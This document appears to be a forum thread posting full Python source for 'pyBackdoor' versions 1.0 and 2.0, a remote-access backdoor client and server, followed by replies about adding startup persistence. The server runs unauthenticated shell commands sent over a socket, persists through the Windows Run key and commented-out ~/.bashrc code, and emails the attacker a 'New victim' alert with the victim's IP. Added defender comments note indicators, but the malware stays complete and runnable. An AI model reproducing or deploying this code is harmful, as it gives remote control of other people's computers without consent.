#!/usr/bin/python
#Commented out == debug
'''
pyBackdoor client
@author: chroniccommand + Xinapse
@contact: chroniccommand@gmail.com
@organization: Poison + iExploit
@summary: Fully working backdoor in Python
@version: 2.0 public
'''
import sys, socket
socksize = 4096
print(\"\"\"
( ) (
( ( )\ ) ( /( )\ ) (
` ) )\ ) )((_) ( /( ( )\())(()/( ( ( )(
/(/( (()/(((_)_ )(_)) )\ ((_)\ ((_)) )\ )\ (()\
((_)_\ )(_))| _ )((_)_ ((_)| |(_) _| | ((_) ((_) ((_)
| '_ \)| || || _ \/ _` |/ _| | / // _` |/ _ \/ _ \| '_|
| .__/ \_, ||___/\__,_|\__| |_\_\\__,_|\___/\___/|_|
|_| |__/
Version: 2.0 Public
Author: Chroniccommand + Xinapse
http://iexploit.org/
http://poison.teamxpc.com
\"\"\")
def main():
# Entry point of the operator console. Requires exactly two command-line
# arguments (<host> <port>); otherwise prints the usage line and exits.
if len(sys.argv) != 3:
print(\"Usage: %s <host> <port>\" % sys.argv[0])
sys.exit()
else:
print(\"Welcome to pyBackdoor main menu. Type ? for help\")
print(\"Type cmdlist for a list of commands\")
# connect() opens the TCP session and then enters the pbd() prompt.
connect()
def connect():
# Opens a TCP connection to the host/port taken from sys.argv and keeps the
# socket in the module-level global `conn`, which pbd() then uses.
# NOTE(review): the socket is a bare SOCK_STREAM socket; no TLS wrapping and
# no authentication exchange happen here before pbd() is entered, so every
# command and reply travels in cleartext.
global conn
global host
global port
conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = sys.argv[1]
port = int(sys.argv[2])
conn.connect((host, port))
pbd()
def pbd():
# Interactive prompt of the operator console. Each recognised menu command
# is translated into a fixed ASCII token and written to the global `conn`
# socket; the reply is read with a recv() of at most `socksize` bytes.
# Defender note: the tokens sent below ('getpid', 'getsys', 'osname',
# 'ifaccess', 'getterm', 'pgetuid', 'seeuser', 'killsrv') go over the wire
# unencrypted and unframed, so they are stable byte strings for network
# signatures and for matching in packet captures.
# NOTE(review): indentation was lost in this listing, so the exact nesting
# (in particular whether the trailing recv()/print sits inside the while
# loop) cannot be confirmed from here.
cmdlist =['?', 'help', 'shell', 'pid', 'sysinfo', 'process', 'name', 'access','getuid', 'user', 'killsrv', 'exit']
print(\"Connected to host \" + sys.argv[1])
td = 1
while td == 1:
cmd = raw_input('pbd> ')
# '?' and 'help' only print the local help text; nothing is sent.
if cmd == '?':
print(\"\"\"
----pyBackdoor command list----
? - Help menu
help - Help menu
cmdlist - List of commands
shell - Drop into shell(buggy)
pid - Get the servers PID
sysinfo - Get system info
name - OS name
access - Test access to /
getterm - Get current terminal
getuid - Get UID
user - Get username
killsrv - Close the server
exit - Exit
\"\"\")
pbd()
elif cmd == 'help':
print(\"\"\"
----pyBackdoor command list----
? - Help menu
help - Help menu
cmdlist - List of commands
shell - Drop into shell(buggy)
pid - Get the servers PID
sysinfo - Get system info
name - OS name
access - Test access to /
getterm - Get current terminal
getuid - Get UID
user - Get username
killsrv - Close the server
exit - Exit
\"\"\")
pbd()
# 'shell' mode: every line typed is sent to the server verbatim (except
# the local keyword 'exitsh'), and one recv() of the reply is printed.
elif cmd == 'shell':
print(\"Dropped into shell. Type exitsh to get back to main menu. Please note this is !very! buggy\")
while True:
shell = raw_input(\"$ \")
if shell == \"exitsh\":
pbd()
else:
conn.send(shell)
data = conn.recv(socksize)
output = data
print(output)
# Fixed-token commands: menu word on the left, wire token on the right.
elif cmd == \"pid\":
conn.send(\"getpid\")
elif cmd == \"sysinfo\":
conn.send(\"getsys\")
elif cmd == 'name':
conn.send('osname')
elif cmd == 'access':
conn.send('ifaccess')
elif cmd == 'getterm':
conn.send('getterm')
elif cmd == 'getuid':
conn.send('pgetuid')
elif cmd == 'user':
conn.send('seeuser')
# 'exit' ends only the console; 'killsrv' also tells the server to stop.
elif cmd == 'exit':
sys.exit()
elif cmd == 'killsrv':
conn.send('killsrv')
conn.close()
sys.exit()
elif cmd == 'cmdlist':
print cmdlist
pbd()
else:
print(\"Command not recognized\")
pbd()
data = conn.recv(socksize)
output = data
print(output)
main()
#!/usr/bin/env python
#Commented out == debug
'''
pyBackdoor server
@author: chroniccommand + Xinapse
@contact: chroniccommand@gmail.com
@organization: Poison + iExploit
@summary: Fully working backdoor in Python
@version: 2.0 public
'''
#Damn... thats a lot of imports
import sys, socket, os, subprocess, time, smtplib, urllib, errno, tempfile, base64
import platform as plt
import fileinput, os.path, random, time
from email.MIMEText import MIMEText
fname = sys.argv[0] #For the current name
fpath = os.getcwd() #Current path
ostype = plt.system()
ostuple = ('Linux', 'Windows')
#Check if the server is already running. If it is, silently close.... like a ninja
class RunOnce:
# Single-instance guard built on a lock file. The path is the system temp
# directory + '/' + the script's base name + '.lock'.
# Defender note: a '<script name>.lock' file in the temp directory is a
# host artefact this sample leaves behind while it runs.
def __init__(self):
import sys
self.lockfile = os.path.normpath(tempfile.gettempdir() + '/' + os.path.basename(__file__) + '.lock')
# Windows branch: delete any existing lock file, then create it exclusively
# (O_CREAT | O_EXCL). If that raises OSError with errno 13, the process
# exits without any message.
if sys.platform == 'win32':
try:
if(os.path.exists(self.lockfile)):
os.unlink(self.lockfile)
self.fd = os.open(self.lockfile, os.O_CREAT | os.O_EXCL | os.O_RDWR)
except OSError, e:
if e.errno == 13:
sys.exit()
# Other platforms: open the lock file for writing and request a
# non-blocking exclusive lock; an IOError from lockf() makes the process
# exit without any message.
else:
import fcntl
self.fp = open(self.lockfile, 'w')
try:
fcntl.lockf(self.fp, fcntl.LOCK_EX | fcntl.LOCK_NB)
except IOError:
sys.exit()
# Cleanup on Windows only: close the descriptor (if it was opened) and
# remove the lock file.
def __del__(self):
import sys
if sys.platform == 'win32':
if hasattr(self, 'fd'):
os.close(self.fd)
os.unlink(self.lockfile)
me = RunOnce()
#if ostype == ostuple[0]:
#Here we have two options. One we can copy the server to a dir or just run it
#Option 1(Turned off by default)
# mypath = os.path.basename(__file__)
# startupfile = os.path.expanduser('~/.bashrc')
# startupline = 'python %s &\n' % os.path.abspath(__file__)
#
# written = False
# for line in fileinput.input(startupfile, inplace=1):
# if mypath in line:
# if not written:
# written = True
# print startupline,
# else:
# print line,
#
# if not written:
# open(startupfile,'a').write('\n'+startupline)
#Option 2 - Copy to ~/.config
# mypath = os.path.basename(__file__)
# startupfile = os.path.expanduser(\"~/.bashrc\")
# newdir = os.path.expanduser(\"~/.config\")
# add = newdir + \"/\" + mypath
# mine = os.path.abspath(__file__)
# startupline = 'python %s &\n' % os.path.abspath(add)
# isexist = os.path.exists(newdir)
# iscpexist = os.path.exists(add)
# if isexist == True:
# if iscpexist == True:
# pass
# else:
# os.system('cp ' + mine + \" \" + newdir)
# written = False
# for line in fileinput.input(startupfile, inplace=1):
# if mypath in line:
# if not written:
# written = True
# print startupline, # rewrite
# #else remove duplicate line
# else:
# print line,
#
# if not written:
# open(startupfile, 'a').write('\n' + startupline)
# else:
# os.mkdir(newdir)
# if iscpexist == True:
# pass
# else:
# os.system('cp ' + mine + \" \" + newdir)
# written = False
# for line in fileinput.input(startupfile, inplace=1):
# if mypath in line:
# if not written:
# written = True
# print startupline,
# else:
# print line,
#
# if not written:
# open(startupfile, 'a').write('\n' + startupline)
if ostype == ostuple[1]:
# Windows-only autostart. ostuple[1] is 'Windows'; the code opens the
# per-user Run key (HKEY_CURRENT_USER\Software\Microsoft\Windows\
# CurrentVersion\Run) and writes a REG_SZ value named "Ntsre" whose data is
# `fname` (set earlier in this file to sys.argv[0]).
# Defender note: this is the standard per-user Run-key persistence
# location. A value called "Ntsre" there, or any Run value pointing at a
# script path, is the registry indicator for this sample; registry-write
# auditing on the Run keys and autostart inventory tools will surface it.
from _winreg import *
startupval = r'Software\Microsoft\Windows\CurrentVersion\Run'
try:
stkey = OpenKey(HKEY_CURRENT_USER, startupval, 0, KEY_ALL_ACCESS)
except:
pass
SetValueEx(stkey, \"Ntsre\", 0, REG_SZ, fname)
CloseKey(stkey)
#Get external IP
# The external address is obtained with a plain HTTP GET to a third-party
# "what is my IP" URL; on any failure a placeholder string is used instead.
# Defender note: this request is the first outbound network event the
# sample produces and is visible in proxy and DNS logs.
try:
# print(\"[DEBUG]IP obtained\")
ip = urllib.urlopen(\"http://poison.teamxpc.com/myip\").read()
except:
ip = \"IP could not be determined\"
#Here we email the attacker with info of the victim.
#Change these!
# The mailbox address and password are stored base64-encoded. base64 is an
# encoding, not protection: anyone holding the file (including an analyst)
# recovers both values with a single decode.
user = 'Y2hyb25pY2NvbW1hbmRAZ21haWwuY29t'
user = base64.b64decode(user)
passwd = 'cGFzc3dvcmQ='
passwd = base64.b64decode(passwd)
message = \"Somebody has opened your pyBackdoor server. \nNew victim at IP: \" + ip
subject = \"pyBackdoor - New victim!\"
# Sender and recipient are the same mailbox: the notification is mailed
# from the account to itself.
from_addr = user
to_addr = user
msg = MIMEText(message)
msg['Subject'] = subject
msg['From'] = from_addr
msg['To'] = to_addr
# Authenticated SMTP submission to smtp.gmail.com on port 587 with STARTTLS.
# Every exception is swallowed, so a blocked or failed send is silent.
# Defender note: SMTP submission (587) originating from a Python process on
# a workstation, right after an IP-lookup HTTP request, is a network-level
# indicator; egress filtering of direct SMTP from endpoints blocks it.
try:
server = smtplib.SMTP('smtp.gmail.com', 587) #port 465 or 587
server.ehlo()
server.starttls()
server.ehlo()
server.login(user, passwd)
server.sendmail(from_addr, to_addr, msg.as_string())
server.close()
print(\"[DEBUG]Sent E-Mail\")
except:
pass
socket.setdefaulttimeout(150)
# Listener setup. host = '' makes bind() listen on every local interface;
# the port is the fixed value 50005 and the receive buffer is 4096 bytes.
# Defender note: a Python process holding a listening TCP socket on 50005
# is a host and network indicator for this sample; a default-deny inbound
# host firewall prevents the listener from being reachable.
host = ''
port = 50005
socksize = 4096
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host, port))
#print(\"[DEBUG]Server started on port: %s\" % port)
s.listen(1)
#print(\"[DEBUG]Now listening...\n\")
# accept() is called once, before the loop, so one connection is served.
conn, addr = s.accept()
# Command loop. Nothing in it checks a password, key or the peer address
# (addr is only referenced by the commented-out debug print) before acting
# on what was received, and the received bytes are compared as cleartext
# strings against a fixed set of tokens.
while True:
# print '[DEBUG]New connection from %s:%d' % (addr[0], addr[1])
data = conn.recv(socksize)
# An empty read (peer closed the connection) ends the loop.
if not data:
break
elif data == 'killsrv':
conn.close()
sys.exit()
elif data == 'osname':
d = os.name
conn.send(d)
# os.access('/', 1): mode 1 is the value of os.X_OK.
elif data == 'ifaccess':
ac = os.access('/', 1)
if ac == True:
iftrue = \"True\"
else:
iftrue = \"False\"
conn.send(iftrue)
elif data == 'getterm':
ge = os.ctermid()
conn.send(ge)
elif data == 'pgetuid':
uid = os.getuid()
uid = str(uid)
conn.send(uid)
elif data == 'seeuser':
us = os.getlogin()
conn.send(us)
elif data == \"getpid\":
pid = os.getpid()
pid = str(pid)
conn.send(\"Current PID: \" + pid)
# 'getsys' returns UID, PID, working directory, os.uname() and the current
# time as six separate send() calls, ending with a fixed trailer string.
elif data == \"getsys\":
unum = os.getuid()
pnum = os.getpid()
curdir = os.getcwd()
sysname = os.uname()
sysname = str(sysname)
curtime = time.time()
curtime = time.ctime(curtime)
conn.send(\"UID: %d\n\" % unum)
conn.send(\"PID: %d\n\" % pnum)
conn.send(\"Current dir: \" + curdir + \"\n\")
conn.send(\"System info: \" + sysname + \"\n\")
conn.send(\"Current time: \" + curtime + \"\n\")
conn.send(\"----End sys info----\")
# Fallback: anything that is not one of the tokens above is handed to a
# shell (shell=True) and its combined stdout/stderr is sent back line by
# line. This is the unauthenticated remote-command-execution path.
# Defender note: on the host it appears as shell child processes whose
# parent is the Python interpreter; process-lineage rules in EDR or audit
# logs catch it.
else:
p = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
for line in p.stdout.readlines():
l = line
conn.send(l)
#!/usr/bin/env python
#Commented out == debug
'''
pyBackdoor server
@author: chroniccommand
@contact: chroniccommand@gmail.com
@organization: Poison
@summary: Backdoor written in Python. Simple as of now, but I plan for this to grow.
@todo: Add more commands. Add to startup.
@version: 1.0 public
'''
import sys, socket, os, subprocess
#socket.setdefaulttimeout(150)
host = ''
# Version 1.0 listener. host = '' binds every local interface; the port is
# the fixed value 50002 and the receive buffer is 1024 bytes. No socket
# timeout is set here (the setdefaulttimeout call is commented out).
# Defender note: a Python process listening on TCP 50002 is the network
# indicator for this older variant.
port = 50002
socksize = 1024
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host, port))
#print(\"Server started on port: %s\" % port)
s.listen(1)
#print(\"Now listening...\n\")
# accept() is called once, before the loop, so one connection is served.
conn, addr = s.accept()
# Command loop: received bytes are compared as cleartext strings against a
# fixed set of tokens; no line checks a password, key or the peer address.
while True:
# print 'New connection from %s:%d' % (addr[0], addr[1])
data = conn.recv(socksize)
# An empty read (peer closed the connection) ends the loop.
if not data:
break
elif data == 'killsrv':
conn.close()
sys.exit()
elif data == 'osname':
d = os.name
conn.send(d)
# os.access('/', 1): mode 1 is the value of os.X_OK.
elif data == 'ifaccess':
ac = os.access('/', 1)
if ac == True:
iftrue = \"True\"
else:
iftrue = \"False\"
conn.send(iftrue)
elif data == 'getterm':
ge = os.ctermid()
conn.send(ge)
elif data == 'pgetuid':
uid = os.getuid()
uid = str(uid)
conn.send(uid)
elif data == 'seeuser':
us = os.getlogin()
conn.send(us)
# Fallback: any other input is passed to os.popen(), i.e. run through the
# system shell, and the command's output is sent back in one send().
# Defender note: this is the unauthenticated remote-command-execution path;
# it shows up as shell child processes of the Python interpreter.
else:
d = os.popen(data)
conn.send(d.read())
#!/usr/bin/python
#Commented out == debug
'''
pyBackdoor client
@author: chroniccommand
@contact: chroniccommand@gmail.com
@organization: Poison
@summary: Backdoor written in Python. Simple as of now, but I plan for this to grow.
@todo: Add more commands. Add to startup.
@version: 1.0 public
'''
import sys, socket, subprocess
socksize = 1024
print(\"\"\"
( ) (
( ( )\ ) ( /( )\ ) (
` ) )\ ) )((_) ( /( ( )\())(()/( ( ( )(
/(/( (()/(((_)_ )(_)) )\ ((_)\ ((_)) )\ )\ (()\
((_)_\ )(_))| _ )((_)_ ((_)| |(_) _| | ((_) ((_) ((_)
| '_ \)| || || _ \/ _` |/ _| | / // _` |/ _ \/ _ \| '_|
| .__/ \_, ||___/\__,_|\__| |_\_\\__,_|\___/\___/|_|
|_| |__/
Version: 1.0 Public
Author: Chroniccommand + Xinapse
http://iexploit.org/
\"\"\")
def main():
# Entry point of the version 1.0 operator console. Requires exactly two
# command-line arguments (<host> <port>); otherwise prints usage and exits.
if len(sys.argv) != 3:
print(\"Usage: %s <host> <port>\" % sys.argv[0])
sys.exit()
else:
print(\"Welcome to pyBackdoor main menu. Type ? for help\")
print(\"Type cmdlist for a list of commands\")
# connect() opens the TCP session and then enters the pbd() prompt.
connect()
def connect():
# Opens a TCP connection to the host/port taken from sys.argv and keeps the
# socket in the module-level global `conn`, which pbd() then uses.
# NOTE(review): the socket is a bare SOCK_STREAM socket; no TLS wrapping and
# no authentication exchange happen here, so traffic is cleartext.
global conn
global host
global port
conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = sys.argv[1]
port = int(sys.argv[2])
conn.connect((host, port))
pbd()
def pbd():
# Interactive prompt of the version 1.0 console. Each recognised menu
# command is translated into a fixed ASCII token and written to the global
# `conn` socket; the reply is read with a recv() of at most `socksize` bytes.
# Defender note: the tokens sent below ('osname', 'ifaccess', 'getterm',
# 'pgetuid', 'seeuser', 'killsrv') travel unencrypted, so they are stable
# byte strings for network signatures.
# NOTE(review): indentation was lost in this listing, so the exact nesting
# (in particular whether the trailing recv()/print sits inside the while
# loop) cannot be confirmed from here.
cmdlist =['?', 'help', 'shell', 'name', 'access', 'getterm', 'getuid', 'user', 'killsrv', 'exit']
print(\"Connected to host \" + sys.argv[1])
td = 1
while td == 1:
cmd = raw_input('pbd> ')
# '?' and 'help' only print the local help text; nothing is sent.
if cmd == '?':
print(\"\"\"
----pyBackdoor command list----
? - Help menu
help - Help menu
cmdlist - List of commands
shell - Drop into shell(buggy)
name - OS name
access - Test access to /
getterm - Get current terminal
getuid - Get UID
user - Get username
killsrv - Close the server
exit - Exit
\"\"\")
pbd()
elif cmd == 'help':
print(\"\"\"
----pyBackdoor command list----
? - Help menu
help - Help menu
cmdlist - List of commands
shell - Drop into shell(buggy)
name - OS name
access - Test access to /
getterm - Get current terminal
getuid - Get UID
user - Get username
killsrv - Close the server
exit - Exit
\"\"\")
pbd()
# 'shell' mode: every line typed is sent to the server verbatim and one
# recv() of the reply is printed; this version has no keyword to leave it.
elif cmd == 'shell':
print(\"Dropped into shell. Please note this is !very! buggy\")
while True:
shell = raw_input(\"$ \")
conn.send(shell)
data = conn.recv(socksize)
output = data
print(output)
# Fixed-token commands: menu word on the left, wire token on the right.
elif cmd == 'name':
conn.send('osname')
elif cmd == 'access':
conn.send('ifaccess')
elif cmd == 'getterm':
conn.send('getterm')
elif cmd == 'getuid':
conn.send('pgetuid')
elif cmd == 'user':
conn.send('seeuser')
# 'exit' ends only the console; 'killsrv' also tells the server to stop.
elif cmd == 'exit':
sys.exit()
elif cmd == 'killsrv':
conn.send('killsrv')
conn.close()
sys.exit()
elif cmd == 'cmdlist':
print cmdlist
pbd()
else:
print(\"Command not recognized\")
data = conn.recv(socksize)
output = data
print(output)
main()
Wheres my credits? :P
I thought this was this http://www.iexploit.org/community/showt ... p?tid=2079
Author: Chroniccommand + Xinapse
Wheres my credits? :P
I thought this was this http://www.iexploit.org/community/showt ... p?tid=2079Author: Chroniccommand + Xinapse
Sorry, forgot to add that on the top part. I'll add it in on the next release.
Also, that other version was not the best(no offense :P). This version is more complete and has pbd.
Wheres my credits? :P
I thought this was this http://www.iexploit.org/community/showt ... p?tid=2079Author: Chroniccommand + Xinapse
Sorry, forgot to add that on the top part. I'll add it in on the next release.
Also, that other version was not the best(no offense :P). This version is more complete and has pbd.
Yeah i know i was just saying that i help do some of it at least
Wheres my credits? :P
I thought this was this http://www.iexploit.org/community/showt ... p?tid=2079Author: Chroniccommand + Xinapse
Sorry, forgot to add that on the top part. I'll add it in on the next release.
Also, that other version was not the best(no offense :P). This version is more complete and has pbd.
Yeah i know i was just saying that i help do some of it at least
Yea plus you started off the whole idea ;P
You can further help by adding to the source since its an opensource community project.
...Not sure how you'd do it in py, probably using sys calls etc...
http://embraceubuntu.com/2005/09/07/add ... at-bootup/
Thats how i'd do it in linux
...Not sure how you'd do it in py, probably using sys calls etc...
http://embraceubuntu.com/2005/09/07/add ... at-bootup/
Thats how i'd do it in linux
I've tried adding to ~/.bashrc but theres a couple problems
[list=1]
[*]It opens up every time a terminal is opened, causing problems such as conflicts(causing the server to crash)[/*:m]
[*]I can't figure out how to make it check to see if it's already running[/*:m][/list:o]
...Not sure how you'd do it in py, probably using sys calls etc...
http://embraceubuntu.com/2005/09/07/add ... at-bootup/
Thats how i'd do it in linux
I've tried adding to ~/.bashrc but theres a couple problems
[list=1]
[*]It opens up every time a terminal is opened, causing problems such as conflicts(causing the server to crash)[/*:m]
[*]I can't figure out how to make it check to see if it's already running[/*:m][/list:o]
Check processes, if it's started then don't reopen it. Or you could close original instance then restart it. You could probably do a separate script to do that or try embedding it within the server script. If you know bash etc you could do it fairly simply, doing it in perl with system calls would be pretty simple I would think. Should be pretty similar
fname = sys.argv[0]
fpath = os.getcwd()
os.system('echo \"python ' + fpath + '/' + fname + ' &\" >> ~/.bashrc')
...Not sure how you'd do it in py, probably using sys calls etc...
http://embraceubuntu.com/2005/09/07/add ... at-bootup/
Thats how i'd do it in linux
I've tried adding to ~/.bashrc but theres a couple problems
[list=1]
[*]It opens up every time a terminal is opened, causing problems such as conflicts(causing the server to crash)[/*:m]
[*]I can't figure out how to make it check to see if it's already running[/*:m][/list:o]
Check processes, if it's started then don't reopen it. Or you could close original instance then restart it. You could probably do a separate script to do that or try embedding it within the server script. If you know bash etc you could do it fairly simply, doing it in perl with system calls would be pretty simple I would think. Should be pretty similar
Well right now I found out what to do. I have a class that checks if the file is currently open, and if it is it closes with no messages or anything. But now I'm having another problem. It's set to add this to the ~/.bashrc:
fname = sys.argv[0]
fpath = os.getcwd()
os.system('echo \"python ' + fpath + '/' + fname + ' &\" >> ~/.bashrc')
So it gets the current path and the name, appends a / to the end right before the name and then tacks on & to run in the background. Only problem is it adds that every time it runs. So it adds multiple lines and adds extra slashes for some reason. I'm working on a function right now that searches the ~/.bashrc file for that and if it has it it wont add it. Hopefully that will eliminate the problem. But then I need to find out how to do it in windows. I guess I'll just use the registry.
...Not sure how you'd do it in py, probably using sys calls etc...
http://embraceubuntu.com/2005/09/07/add ... at-bootup/
Thats how i'd do it in linux
I've tried adding to ~/.bashrc but theres a couple problems
[list=1]
[*]It opens up every time a terminal is opened, causing problems such as conflicts(causing the server to crash)[/*:m]
[*]I can't figure out how to make it check to see if it's already running[/*:m][/list:o]
Check processes, if it's started then don't reopen it. Or you could close original instance then restart it. You could probably do a separate script to do that or try embedding it within the server script. If you know bash etc you could do it fairly simply, doing it in perl with system calls would be pretty simple I would think. Should be pretty similar
Well right now I found out what to do. I have a class that checks if the file is currently open, and if it is it closes with no messages or anything. But now I'm having another problem. It's set to add this to the ~/.bashrc:
fname = sys.argv[0]
fpath = os.getcwd()
os.system('echo \"python ' + fpath + '/' + fname + ' &\" >> ~/.bashrc')
So it gets the current path and the name, appends a / to the end right before the name and then tacks on & to run in the background. Only problem is it adds that every time it runs. So it adds multiple lines and adds extra slashes for some reason. I'm working on a function right now that searches the ~/.bashrc file for that and if it has it it wont add it. Hopefully that will eliminate the problem. But then I need to find out how to do it in windows. I guess I'll just use the registry.
Registry startup would be the best. Boxes running python in windows are rare tho... I would have thought anyway. Unless you convert to binary etc.
8.2mb
8.2mb
Please tell me you put the 'm' in by mistake. :O